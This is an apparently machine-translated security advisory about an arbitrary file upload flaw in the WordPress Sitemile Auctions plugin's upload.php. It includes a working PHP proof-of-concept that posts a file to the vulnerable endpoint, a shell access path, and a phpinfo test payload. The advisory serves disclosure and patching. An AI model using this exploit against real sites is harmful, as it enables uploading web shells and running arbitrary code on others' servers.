WordPress Sitemile Auctions plugin arbitrary file upload vulnerability-vulnerability warning-the black bar safety net

2012-06-26T00:00:00
ID MYHACK58:62201234187
Type myhack58
Reporter 佚名
Modified 2012-06-26T00:00:00

Description

Release date: 2012-06-19

Update date: 2012-06-20

Affected system:

WordPress Sitemile Auctions Plugin 2. x

Description:

--------------------------------------------------------------------------------

WordPress is a PHP language and MySQL database development Blog(blog, blog)engine, users can support PHP and MySQL database server on build your own Blog.

Sitemile Auctions Plugin for WordPress 2.0.1.3 previous version of the wp-content/plugins/auctionPlugin/upload. the php script allows to upload any extension file to the webroot folder by Upload a malicious PHP script to execute arbitrary PHP code.

<*source: Sammy Forgit

Links: http://secunia.com/advisories/49497/

http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-auctions-plugin-arbitrary-file-upload-vulnerability.html

*>

Test method:

--------------------------------------------------------------------------------

Warning

The following procedures(methods)may carry offensive, for security research and teaching purposes. The user at your own risk!

Sammy Forgit ()provides the following test methods:

PostShell.php

<? php

$uploadfile="lo.php";

$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/auctionPlugin/uploadify/upload.php?folder=/wordpress/wp-content/uploads/");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

array('Filedata'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?& gt;

Shell Access : http://www.exemple.com/wordpress/wp-content/uploads/lo.php

Filename : [CTRL-u] PostShell.php after executed

lo.php

<? php

phpinfo();

?& gt;

Recommendations:

--------------------------------------------------------------------------------

Manufacturers patch:

WordPress

---------

The current vendors have released an upgrade patch to fix this security issue, please go to the manufacturers home page download:

http://wordpress.org/